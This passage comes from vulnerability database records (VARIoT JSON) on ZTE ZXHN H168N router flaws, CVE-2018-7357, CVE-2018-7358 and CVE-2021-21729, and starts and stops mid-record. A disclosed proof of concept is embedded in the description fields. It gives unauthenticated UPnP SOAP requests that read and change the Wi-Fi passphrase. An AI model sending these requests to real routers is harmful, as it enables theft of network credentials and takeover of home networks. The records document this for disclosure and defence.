"data": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access. ZTE ZXHN H168N The product contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. \nZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is a wireless VDSL router of China ZTE Corporation (ZTE). The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 version, V2.2.0_PK1.2T2 version, V2.2.0_PK11T7 version, V2.2.0_PK11T version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)\n\n\n\n\nDisclaimer: [This POC is for Educational Purposes , I would Not be\n\n\nresponsible for any misuse of the information mentioned in this blog post]\n\n\n\n\n[+] Unauthenticated\n\n\n\n\n[+] Author: Usman Saeed (usman [at] xc0re.net)\n\n\n\n\n[+] Protocol: UPnP\n\n\n\n\n[+] Affected Harware/Software:\n\n\n\n\nModel name: ZXHN H168N v2.2\n\n\n\n\nBuild Timestamp: 20171127193202\n\n\n\n\nSoftware Version: V2.2.0_PK1.2T5\n\n\n\n\n[+] Findings:\n\n\n\n\n1. Unauthenticated access to WLAN password:\n\n\n\n\nPOST /control/igd/wlanc_1_1 HTTP/1.1\n\n\nHost: \u003cIP\u003e:52869\n\n\nUser-Agent: {omitted}\n\n\nContent-Length: 288\n\n\nConnection: close\n\n\nContent-Type: text/xml; charset=\"utf-8\"\n\n\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys\" 1\n\n\n\n\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\n\n\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"\u003e\u003c/u:GetSecurityKeys\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\n\n\n2. Unauthenticated WLAN passphrase change:\n\n\n\n\nPOST /control/igd/wlanc_1_1 HTTP/1.1\n\n\nHost: \u003cIP\u003e:52869\n\n\nUser-Agent: {omitted}\n\n\nContent-Length: 496\n\n\nConnection: close\n\n\nContent-Type: text/xml; charset=\"utf-8\"\n\n\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys\"\n\n\n\n\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\n\n\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:SetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"\u003e\u003cNewWEPKey0\u003e{omitted}\u003c/NewWEPKey0\u003e\u003cNewWEPKey1\u003e{omitted}\u003c/NewWEPKey1\u003e\u003cNewWEPKey2\u003e{omitted}\u003c/NewWEPKey2\u003e\u003cNewWEPKey3\u003e{omitted}\u003c/NewWEPKey3\u003e\u003cNewPreSharedKey\u003e{omitted}\u003c/NewPreSharedKey\u003e\u003cNewKeyPassphrase\u003e{omitted}\u003c/NewKeyPassphrase\u003e\u003c/u:SetSecurityKeys\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\n\n\n[*] Solution:\n\n\n\n\nUPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices. \n\n\n\n\n[*] Note:\n\n\n\n\nThere are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same. \n\n\n\n\n[+] Responsible Disclosure:\n\n\n\n\nVulnerabilities identified - 20 August, 2018\n\n\n\n\nReported to ZTE - 28 August, 2018\n\n\n\n\nZTE official statement - 17 September 2018\n\n\n\n\nZTE patched the vulnerability - 12 November 2018\n\n\n\n\nThe operator pushed the update - 12 November 2018\n\n\n\n\nCVE published - CVE- 2018-7357 and CVE-2018-7358\n\n\n\n\nPublic disclosure - 12 November 2018\n\n\n\n\nRef: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522\n\n\n\n\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7357"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012682"
},
{
"db": "BID",
"id": "105983"
},
{
"db": "VULHUB",
"id": "VHN-137389"
},
{
"db": "PACKETSTORM",
"id": "150728"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7357",
"trust": 2.9
},
{
"db": "ZTE",
"id": "1009523",
"trust": 2.0
},
{
"db": "EXPLOIT-DB",
"id": "45972",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012682",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201811-444",
"trust": 0.7
},
{
"db": "BID",
"id": "105983",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "150728",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-137389",
"trust": 0.1
},
{
"db": "ZTE",
"id": "1009522",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137389"
},
{
"db": "BID",
"id": "105983"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012682"
},
{
"db": "PACKETSTORM",
"id": "150728"
},
{
"db": "NVD",
"id": "CVE-2018-7357"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-444"
}
]
},
"id": "VAR-201811-0983",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-137389"
}
],
"trust": 0.47662336000000005
},
"last_update_date": "2023-12-18T12:28:36.602000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Improper Authorization Vulnerabilities in ZTE ZXHN H168N Product",
"trust": 0.8,
"url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523"
},
{
"title": "ZTE ZXHN H168N Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=86847"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012682"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-444"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137389"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012682"
},
{
"db": "NVD",
"id": "CVE-2018-7357"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/45972/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7357"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7357"
},
{
"trust": 0.3,
"url": "http://www.zte.com.cn/"
},
{
"trust": 0.1,
"url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009522"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:body\u003e\u003cu:getsecuritykeys"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\""
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7358"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:body\u003e\u003cu:setsecuritykeys"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137389"
},
{
"db": "BID",
"id": "105983"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012682"
},
{
"db": "PACKETSTORM",
"id": "150728"
},
{
"db": "NVD",
"id": "CVE-2018-7357"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-444"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-137389"
},
{
"db": "BID",
"id": "105983"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012682"
},
{
"db": "PACKETSTORM",
"id": "150728"
},
{
"db": "NVD",
"id": "CVE-2018-7357"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-444"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-11-14T00:00:00",
"db": "VULHUB",
"id": "VHN-137389"
},
{
"date": "2018-09-17T00:00:00",
"db": "BID",
"id": "105983"
},
{
"date": "2019-02-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012682"
},
{
"date": "2018-12-11T01:49:45",
"db": "PACKETSTORM",
"id": "150728"
},
{
"date": "2018-11-14T15:29:02.187000",
"db": "NVD",
"id": "CVE-2018-7357"
},
{
"date": "2018-11-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201811-444"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-137389"
},
{
"date": "2018-09-17T00:00:00",
"db": "BID",
"id": "105983"
},
{
"date": "2019-02-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012682"
},
{
"date": "2019-10-09T23:42:15.503000",
"db": "NVD",
"id": "CVE-2018-7357"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201811-444"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201811-444"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE ZXHN H168N Vulnerabilities related to certificate and password management in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012682"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201811-444"
}
],
"trust": 0.6
}
}
var-202104-0777
Vulnerability from variot
Some ZTE products have CSRF vulnerability. Because some pages lack CSRF random value verification, attackers could perform illegal authorization operations by constructing messages.This affects: ZXHN H168N V3.5.0_EG1T5_TE, V2.5.5, ZXHN H108N V2.5.5_BTMT1
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202104-0777",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 1.0,
"vendor": "zte",
"version": "3.5.0_eg1t5_te"
},
{
"model": "zxhn h108n",
"scope": "eq",
"trust": 1.0,
"vendor": "zte",
"version": "2.5.5_btmt1"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21729"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:3.5.0_eg1t5_te:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxhn_h168n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h108n_firmware:2.5.5_btmt1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxhn_h108n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21729"
}
]
},
"cve": "CVE-2021-21729",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2021-21729",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-21729",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-941",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-21729",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-21729"
},
{
"db": "NVD",
"id": "CVE-2021-21729"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-941"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Some ZTE products have CSRF vulnerability. Because some pages lack CSRF random value verification, attackers could perform illegal authorization operations by constructing messages.This affects: ZXHN H168N V3.5.0_EG1T5_TE, V2.5.5, ZXHN H108N V2.5.5_BTMT1",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21729"
},
{
"db": "VULMON",
"id": "CVE-2021-21729"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "ZTE",
"id": "1014904",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2021-21729",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-202104-941",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-21729",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-21729"
},
{
"db": "NVD",
"id": "CVE-2021-21729"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-941"
}
]
},
"id": "VAR-202104-0777",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.31331168
},
"last_update_date": "2023-12-18T14:00:11.390000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-330",
"trust": 1.0
},
{
"problemtype": "CWE-352",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21729"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1014904"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21729"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/352.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-21729"
},
{
"db": "NVD",
"id": "CVE-2021-21729"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-941"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2021-21729"
},
{
"db": "NVD",
"id": "CVE-2021-21729"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-941"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-13T00:00:00",
"db": "VULMON",
"id": "CVE-2021-21729"
},
{
"date": "2021-04-13T16:15:12.373000",
"db": "NVD",
"id": "CVE-2021-21729"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-941"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-21T00:00:00",
"db": "VULMON",
"id": "CVE-2021-21729"
},
{
"date": "2022-06-28T14:11:45.273000",
"db": "NVD",
"id": "CVE-2021-21729"
},
{
"date": "2022-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-941"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-941"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE Cross-site request forgery vulnerabilities in multiple products",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-941"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-941"
}
],
"trust": 0.6
}
}
var-201811-0984
Vulnerability from variot
ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations. ZTE ZXHN H168N The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. ZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is China's ZTE Corporation ( ZTE ) company’s a wireless VDSL router. ZTE ZXHN H168N There are security holes in . The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 Version, V2.2.0_PK1.2T2 Version, V2.2.0_PK11T7 Version, V2.2.0_PK11T Version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)
Disclaimer: [This POC is for Educational Purposes , I would Not be
responsible for any misuse of the information mentioned in this blog post]
[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Harware/Software:
Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5
[+] Findings:
- Unauthenticated access to WLAN password:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host:
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1
- Unauthenticated WLAN passphrase change:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host:
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"
[*] Solution:
UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.
[*] Note:
There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.
[+] Responsible Disclosure:
Vulnerabilities identified - 20 August, 2018
Reported to ZTE - 28 August, 2018
ZTE official statement - 17 September 2018
ZTE patched the vulnerability - 12 November 2018
The operator pushed the update - 12 November 2018
CVE published - CVE- 2018-7357 and CVE-2018-7358
Public disclosure - 12 November 2018
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201811-0984",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 2.4,
"vendor": "zte",
"version": "2.2.0_pk1.2t2"
},
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 2.4,
"vendor": "zte",
"version": "2.2.0_pk1.2t5"
},
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 2.4,
"vendor": "zte",
"version": "2.2.0_pk11t"
},
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 2.4,
"vendor": "zte",
"version": "2.2.0_pk11t7"
},
{
"model": "zxhn h168n 2.2.0 pk11t7",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h168n 2.2.0 pk11t",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h168n 2.2.0 pk1.2t5",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h168n 2.2.0 pk1.2t2",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h168n 2.2.0 pk1.2t6",
"scope": "ne",
"trust": 0.3,
"vendor": "zte",
"version": null
}
],
"sources": [
{
"db": "BID",
"id": "105963"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012683"
},
{
"db": "NVD",
"id": "CVE-2018-7358"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-445"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk1.2t2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
